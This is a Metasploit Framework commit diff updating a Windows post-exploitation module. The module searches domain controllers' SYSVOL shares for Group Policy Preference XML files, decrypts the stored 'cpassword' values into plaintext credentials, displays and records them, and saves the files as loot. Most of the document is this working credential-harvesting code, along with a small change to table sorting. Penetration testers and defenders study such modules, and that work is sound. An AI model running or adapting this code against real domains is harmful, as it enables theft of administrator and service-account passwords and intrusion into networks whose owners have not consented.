Merge branch 'post_win_gather_creds_gpp_pass' of https://github.com/Meatballs1/metasploit-framework into Meatballs1-post_win_gather_creds_gpp_pass

unstable
sinn3r 2012-07-17 08:28:19 -05:00
commit fbe0cb7471
2 changed files with 133 additions and 34 deletions

View File

@ -55,6 +55,10 @@ class Table
# #
# The text to affix to the end of the table. # The text to affix to the end of the table.
# #
# Sortindex
#
# The column to sort the table on, -1 disables sorting.
#
def initialize(opts = {}) def initialize(opts = {})
self.header = opts['Header'] self.header = opts['Header']
self.headeri = opts['HeaderIndent'] || 0 self.headeri = opts['HeaderIndent'] || 0
@ -184,6 +188,7 @@ class Table
# avoid actually resolving domain names. # avoid actually resolving domain names.
# #
def sort_rows(index=sort_index) def sort_rows(index=sort_index)
return if index == -1
return unless rows return unless rows
rows.sort! do |a,b| rows.sort! do |a,b|
if a[index].nil? if a[index].nil?

View File

@ -47,11 +47,11 @@ class Metasploit3 < Msf::Post
register_options([ register_options([
OptBool.new('ALL', [false, 'Enumerate all domains on network.', true]), OptBool.new('ALL', [false, 'Enumerate all domains on network.', true]),
OptBool.new('STORE', [false, 'Store the enumerated files in loot.', true]),
OptString.new('DOMAINS', [false, 'Enumerate list of space seperated domains DOMAINS="dom1 dom2".'])], self.class) OptString.new('DOMAINS', [false, 'Enumerate list of space seperated domains DOMAINS="dom1 dom2".'])], self.class)
end end
def run def run
group_path = "MACHINE\\Preferences\\Groups\\Groups.xml" group_path = "MACHINE\\Preferences\\Groups\\Groups.xml"
group_path_user = "USER\\Preferences\\Groups\\Groups.xml" group_path_user = "USER\\Preferences\\Groups\\Groups.xml"
service_path = "MACHINE\\Preferences\\Services\\Services.xml" service_path = "MACHINE\\Preferences\\Services\\Services.xml"
@ -63,32 +63,59 @@ class Metasploit3 < Msf::Post
task_path_user = "USER\\Preferences\\ScheduledTasks\\ScheduledTasks.xml" task_path_user = "USER\\Preferences\\ScheduledTasks\\ScheduledTasks.xml"
domains = [] domains = []
dcs = []
basepaths = [] basepaths = []
fullpaths = [] fullpaths = []
@enumed_domains = [] cached_domain_controller = nil
print_status "Checking locally.." print_status "Checking locally..."
locals = get_basepaths(client.fs.file.expand_path("%SYSTEMROOT%\\SYSVOL\\sysvol")) locals = get_basepaths(client.fs.file.expand_path("%SYSTEMROOT%\\SYSVOL\\sysvol"))
unless locals.blank? unless locals.blank?
basepaths << locals basepaths << locals
print_good "Policy Sahres found locally" print_good "Group Policy Files found locally"
end end
# If user supplied domains this implicitly cancels the ALL flag.
if datastore['ALL'] and datastore['DOMAINS'].blank? if datastore['ALL'] and datastore['DOMAINS'].blank?
print_status "Enumerating Domains on the Network..."
domains = enum_domains domains = enum_domains
domains.reject!{|n| n == "WORKGROUP"} domains.reject!{|n| n == "WORKGROUP" || n.to_s.empty?}
end end
datastore['DOMAINS'].split('').each{|ud| domains << ud} if datastore['DOMAINS'] # Add user specified domains to list.
unless datastore['DOMAINS'].blank?
if datastore['DOMAINS'].match(/\./)
print_error "DOMAINS must not contain DNS style domain names e.g. 'mydomain.net'. Instead use 'mydomain'."
return
end
user_domains = datastore['DOMAINS'].split(' ')
user_domains = user_domains.map {|x| x.upcase}
print_status "Enumerating the user supplied Domain(s): #{user_domains.join(', ')}..."
user_domains.each{|ud| domains << ud}
end
# If we find a local policy store then assume we are on DC and do not wish to enumerate the current DC again.
# If user supplied domains we do not wish to enumerate registry retrieved domains.
if locals.blank? && user_domains.blank?
print_status "Enumerating domain information from the local registry..."
domains << get_domain_reg domains << get_domain_reg
end
domains.flatten! domains.flatten!
domains.compact! domains.compact!
domains.uniq! domains.uniq!
# Dont check registry if we find local files.
cached_dc = get_cached_domain_controller if locals.blank?
domains.each do |domain| domains.each do |domain|
dcs = enum_dcs(domain) dcs = enum_dcs(domain)
dcs = [] if dcs.nil?
# Add registry cached DC for the test case where no DC is enumerated on the network.
if !cached_dc.nil? && (cached_dc.include? domain)
dcs << cached_dc
end
next if dcs.blank? next if dcs.blank?
dcs.uniq! dcs.uniq!
tbase = [] tbase = []
@ -149,9 +176,8 @@ class Metasploit3 < Msf::Post
return locals return locals
end end
def find_path(path, xml_path) def find_path(path, xml_path)
xml_path = "#{path}\\#{xml_path}" xml_path = "#{path}#{xml_path}"
begin begin
return xml_path if client.fs.file.stat(xml_path) return xml_path if client.fs.file.stat(xml_path)
rescue Rex::Post::Meterpreter::RequestError => e rescue Rex::Post::Meterpreter::RequestError => e
@ -188,11 +214,10 @@ class Metasploit3 < Msf::Post
def parse_xml(xmlfile) def parse_xml(xmlfile)
mxml = xmlfile[:xml] mxml = xmlfile[:xml]
print_status "Parsing file: #{xmlfile[:path]} ..." print_status "Parsing file: #{xmlfile[:path]} ..."
filetype = xmlfile[:path].split('\\').last()
mxml.elements.to_a("//Properties").each do |node| mxml.elements.to_a("//Properties").each do |node|
epassword = node.attributes['cpassword'] epassword = node.attributes['cpassword']
next if epassword.to_s.empty? next if epassword.to_s.empty?
next if @enumed_domains.include? xmlfile[:domain]
@enumed_domains << xmlfile[:domain]
pass = decrypt(epassword) pass = decrypt(epassword)
user = node.attributes['runAs'] if node.attributes['runAs'] user = node.attributes['runAs'] if node.attributes['runAs']
@ -202,15 +227,28 @@ class Metasploit3 < Msf::Post
user = node.attributes['newName'] unless node.attributes['newName'].blank? user = node.attributes['newName'] unless node.attributes['newName'].blank?
changed = node.parent.attributes['changed'] changed = node.parent.attributes['changed']
# Printers and Shares
path = node.attributes['path']
# Datasources
dsn = node.attributes['dsn']
driver = node.attributes['driver']
# Tasks
app_name = node.attributes['appName']
# Services
service = node.attributes['serviceName']
# Groups
expires = node.attributes['expires'] expires = node.attributes['expires']
never_expires = node.attributes['neverExpires'] never_expires = node.attributes['neverExpires']
disabled = node.attributes['acctDisabled'] disabled = node.attributes['acctDisabled']
table = Rex::Ui::Text::Table.new( table = Rex::Ui::Text::Table.new(
'Header' => 'Group Policy Credential Info', 'Header' => 'Group Policy Credential Info',
'Indent' => 1, 'Indent' => 1,
'SortIndex' => 5, 'SortIndex' => -1,
'Columns' => 'Columns' =>
[ [
'Name', 'Name',
@ -218,6 +256,7 @@ class Metasploit3 < Msf::Post
] ]
) )
table << ["TYPE", filetype]
table << ["USERNAME", user] table << ["USERNAME", user]
table << ["PASSWORD", pass] table << ["PASSWORD", pass]
table << ["DOMAIN CONTROLLER", xmlfile[:dc]] table << ["DOMAIN CONTROLLER", xmlfile[:dc]]
@ -226,14 +265,27 @@ class Metasploit3 < Msf::Post
table << ["EXPIRES", expires] unless expires.blank? table << ["EXPIRES", expires] unless expires.blank?
table << ["NEVER_EXPIRES?", never_expires] unless never_expires.blank? table << ["NEVER_EXPIRES?", never_expires] unless never_expires.blank?
table << ["DISABLED", disabled] unless disabled.blank? table << ["DISABLED", disabled] unless disabled.blank?
table << ["PATH", path] unless path.blank?
table << ["DATASOURCE", dsn] unless dsn.blank?
table << ["DRIVER", driver] unless driver.blank?
table << ["TASK", app_name] unless app_name.blank?
table << ["SERVICE", service] unless service.blank?
node.elements.each('//Attributes//Attribute') do |dsn_attribute|
table << ["ATTRIBUTE", "#{dsn_attribute.attributes['name']} - #{dsn_attribute.attributes['value']}"]
end
print_good table.to_s print_good table.to_s
if datastore['STORE']
stored_path = store_loot('windows.gpp.xml', 'text/plain', session, xmlfile[:xml], filetype, xmlfile[:path])
print_status("XML file saved to: #{stored_path}")
end
report_creds(user,pass) unless disabled and disabled == '1' report_creds(user,pass) unless disabled and disabled == '1'
end end
end end
def report_creds(user, pass) def report_creds(user, pass)
if session.db_record if session.db_record
source_id = session.db_record.id source_id = session.db_record.id
@ -268,9 +320,7 @@ class Metasploit3 < Msf::Post
return pass return pass
end end
def enum_domains def enum_domains
print_status "Enumerating Domains on the Network..."
domain_enum = 0x80000000 # SV_TYPE_DOMAIN_ENUM domain_enum = 0x80000000 # SV_TYPE_DOMAIN_ENUM
buffersize = 500 buffersize = 500
result = client.railgun.netapi32.NetServerEnum(nil,100,4,buffersize,4,4,domain_enum,nil,nil) result = client.railgun.netapi32.NetServerEnum(nil,100,4,buffersize,4,4,domain_enum,nil,nil)
@ -288,7 +338,7 @@ class Metasploit3 < Msf::Post
end end
count = result['totalentries'] count = result['totalentries']
print_status("#{count} domain(s) found.") print_status("#{count} Domain(s) found.")
startmem = result['bufptr'] startmem = result['bufptr']
base = 0 base = 0
@ -309,11 +359,20 @@ class Metasploit3 < Msf::Post
base = base + 8 base = base + 8
end end
domains.uniq!
print_status "Retrieved Domain(s) #{domains.join(', ')} from network"
return domains return domains
end end
def enum_dcs(domain) def enum_dcs(domain)
print_status("Enumerating DCs for #{domain}") # Prevent crash if FQDN domain names are searched for or other disallowed characters:
# http://support.microsoft.com/kb/909264 \/:*?"<>|
if domain =~ /[:\*?"<>\\\/.]/
print_error("Cannot enumerate domain name contains disallowed characters: #{domain}")
return nil
end
print_status("Enumerating DCs for #{domain} on the network...")
domaincontrollers = 24 # 10 + 8 (SV_TYPE_DOMAIN_BAKCTRL || SV_TYPE_DOMAIN_CTRL) domaincontrollers = 24 # 10 + 8 (SV_TYPE_DOMAIN_BAKCTRL || SV_TYPE_DOMAIN_CTRL)
buffersize = 500 buffersize = 500
result = client.railgun.netapi32.NetServerEnum(nil,100,4,buffersize,4,4,domaincontrollers,domain,nil) result = client.railgun.netapi32.NetServerEnum(nil,100,4,buffersize,4,4,domaincontrollers,domain,nil)
@ -344,18 +403,53 @@ class Metasploit3 < Msf::Post
return hostnames return hostnames
end end
def get_domain_reg # We use this for the odd test case where a DC is unable to be enumerated from the network
# but is cached in the registry.
def get_cached_domain_controller
begin begin
subkey = "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\Tcpip\\Parameters\\" subkey = "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Group Policy\\History\\"
v_name = "Domain" v_name = "DCName"
dc = registry_getvaldata(subkey, v_name).gsub(/\\/, '').upcase
print_status "Retrieved DC #{dc} from registry"
return dc
rescue
print_status("No DC found in registry")
end
end
def get_domain_reg
locations = []
# Lots of redundancy but hey this is quick!
locations << ["HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\Tcpip\\Parameters\\", "Domain"]
locations << ["HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\", "DefaultDomainName"]
locations << ["HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Group Policy\\History\\", "MachineDomain"]
domains = []
# Pulls cached domains from registry
domain_cache = registry_enumvals("HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\DomainCache\\")
if domain_cache
domain_cache.each { |ud| domains << ud }
end
locations.each do |location|
begin
subkey = location[0]
v_name = location[1]
domain = registry_getvaldata(subkey, v_name) domain = registry_getvaldata(subkey, v_name)
print_status "Retrieved domain #{domain} from registry "
rescue Rex::Post::Meterpreter::RequestError => e rescue Rex::Post::Meterpreter::RequestError => e
print_error "Received error code #{e.code} - #{e.message} when reading the registry." print_error "Received error code #{e.code} - #{e.message}"
end
domain = domain.split('.')[0].upcase
return domain
end end
unless domain.blank?
domain_parts = domain.split('.')
domains << domain.split('.').first.upcase unless domain_parts.empty?
end
end
domains.uniq!
print_status "Retrieved Domain(s) #{domains.join(', ')} from registry"
return domains
end
end end